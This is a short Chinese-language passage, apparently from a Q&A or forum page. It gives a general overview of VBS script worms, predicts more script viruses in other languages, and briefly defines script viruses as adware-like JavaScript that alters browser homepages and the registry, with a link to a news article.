隨著網路的飛速發展,網路蠕蟲病毒開始流行,而VBS腳本蠕蟲則更加突出,不僅數量多,而且威力大。由於利用腳本編寫病毒比較簡單,除了將繼續流行目前的VBS腳本病毒外,將會逐漸出現更多的其它腳本類病毒,譬如PHP,JS,Perl病毒等。但是腳本並不是真正病毒技術愛好者編寫病毒的最佳工具,並且腳本病毒解除起來比較容易、相對容易防範。筆者認為,腳本病毒仍將繼續流行,但是能夠具有像宏病毒、新歡樂時光那樣大影響的腳本蠕蟲病毒只是少數。

『拾』 什麼叫腳本病毒

腳本病毒通常是JavaScript代碼編寫的惡意代碼,
一般帶有廣告性質,會修改您的IE首頁、修改注冊表等信息,造成用戶使用計算機不方便。

http://tech.163.com/04/1125/10/161E2F1L000915E9.html
這個上很詳細。